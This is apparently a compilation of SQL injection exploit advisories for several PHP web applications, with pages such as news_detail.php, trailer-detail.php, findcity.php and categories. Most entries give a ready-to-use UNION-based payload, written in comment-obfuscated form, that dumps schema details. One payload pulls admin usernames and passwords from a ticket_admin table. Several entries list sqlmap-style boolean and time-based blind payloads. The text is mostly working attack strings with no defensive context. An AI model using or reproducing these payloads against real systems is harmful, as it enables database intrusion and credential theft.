The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/news_detail.php?newid=[SQL]
-7'++/*!06666UNION*/(/*!06666SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!06666Select*/+export_set(5,@:=0,(/*!06666select*/+count(*)/*!06666from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!06666table_name*/,0x3c6c693e,2),/*!06666column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629)--+-
http://localhost/[PATH]/event_detail.php?eventid=[SQL]
-1'++/*!04444UNION*/(/*!04444SELECT*/+0x283129,0x494853414e2053454e43414e,(/*!04444Select*/+export_set(5,@:=0,(/*!04444select*/+count(*)/*!04444from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!04444table_name*/,0x3c6c693e,2),/*!04444column_name*/,0xa3a,2)),@,2)),0x283429,0x283529,0x283629,0x37)--+-

The vulnerability allows an attacker to inject SQL commands into the 'sourcebus' parameter of the 'booker_details.php' script. Proof of Concept examples are provided in the text.

The vulnerability allows an attacker to inject SQL commands by manipulating the 'Projectmain', 'proj_type' and 'searchtext' parameters of the 'search-results.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script.

The vulnerability allows an attacker to inject SQL commands into the 'findcity.php' file, which can be used to extract information from the database.

The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
1) http://localhost/[PATH]/trailer-detail.php?moid=[SQL]
-122'++UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x),13,14,15,16,17,18,19,20,21,22,23--+-
2) http://localhost/[PATH]/show-time.php?moid=[SQL]
-102'++UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME=0x7469636b65745f61646d696e)AND(0x00)IN(@x:=concat(@x,CONCAT(LPAD(@NR:=@NR+1,2,0x30),0x3a20,column_name,0x3c62723e)))))x),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23))--+-
3) http://localhost/[PATH]/event-detail.php?eid=[SQL]
-45'++UNION+SELECT+1,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(ticket_admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_user,admin_pass,0x3c62723e))))x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+-

The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/findcity.php?q=[SQL]
s'+/*!02222UNION*/+/*!02222SELECT*/+0x31,0x32,0x33,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x35,0x36,0x37,0x38,0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230--+-
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=s%' AND 6957=6957 AND '%'='
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: q=s%' AND SLEEP(5) AND '%'='

The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/success-story.php?succid=[SQL]
-16++/*!02222UNION*/(/*!02222SELECT*/+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,(/*!02222Select*/+export_set(5,@:=0,(/*!02222select*/+count(*)/*!02222from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!02222table_name*/,0x3c6c693e,2),/*!02222column_name*/,0xa3a,2)),@,2)),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929)--+-

The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/property-list?tbud=5001-10000[SQL]&quicksrch1=
34 columns
Parameter: tbud (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tbud=5001-10000 AND 4719=4719&quicksrch1=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: tbud=5001-10000 AND SLEEP(5)&quicksrch1=

The vulnerability allows an attacker to inject SQL commands.
Proof of Concept:
http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&report_videos[]=[SQL]&report_submit=
http://server/single-video-detail.php?video_id=MTMy&report_videos[]='&report_submit=
Parameter: report_videos[] (GET)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)
    Payload: video_id=MTMy&report_videos[]=1' AND ELT(7764=7764,9174) AND 'BZFh'='BZFh&report_submit=
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: video_id=MTMy&report_videos[]=1' AND SLEEP(5) AND 'MRQT'='MRQT&report_submit=

The vulnerability allows an attacker to inject SQL commands by sending malicious requests to the vulnerable application.
Proof of Concept:
1) http://localhost/[PATH]/categories?subctid=[SQL]
-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
http://server/categories?subctid=-yzEb7895'++UNION+ALL+SELECT+CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())--+-
2) http://localhost/[PATH]/categories?&mctid=[SQL]
-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-
http://server/categories?&mctid=-Y12h7881'++UNION+ALL+SELECT+(SELECT(@x)FROM(SELECT(@x:=0x00),(@NR:=0),(SELECT(0)FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA!=0x696e666f726d6174696f6e5f736368656d61)AND(0x00)IN(@x:=CONCAT(@x,LPAD(@NR:=@NR%2b1,4,0x30),0x3a20,table_name,0x3c62723e))))x)--+-